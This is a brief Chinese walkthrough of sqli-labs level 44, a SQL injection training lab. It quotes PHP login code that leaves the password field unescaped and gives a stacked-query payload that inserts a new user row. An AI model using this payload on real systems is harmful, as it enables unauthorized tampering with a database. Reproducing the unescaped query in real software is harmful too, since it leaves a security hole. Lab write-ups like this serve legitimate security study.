sqli-labs(44)

第四十四关

本关是基于盲注的，这里盲注主要是要没有报错信息，所以要采用盲注。这关与42关的区别就在于没有报错信息

 

过滤点：

   $username = mysqli_real_escape_string($con1, $_POST["login_user"]);
   $password = $_POST["login_password"];

sql语句：

  $sql = "SELECT * FROM users WHERE username='$username' and password='$password'";

复制代码

 

那么这不是 直接构造payload吗？

随意输入用户名，密码如下：

paload：
a';insert into users values(107,'aaa'，'aaa')#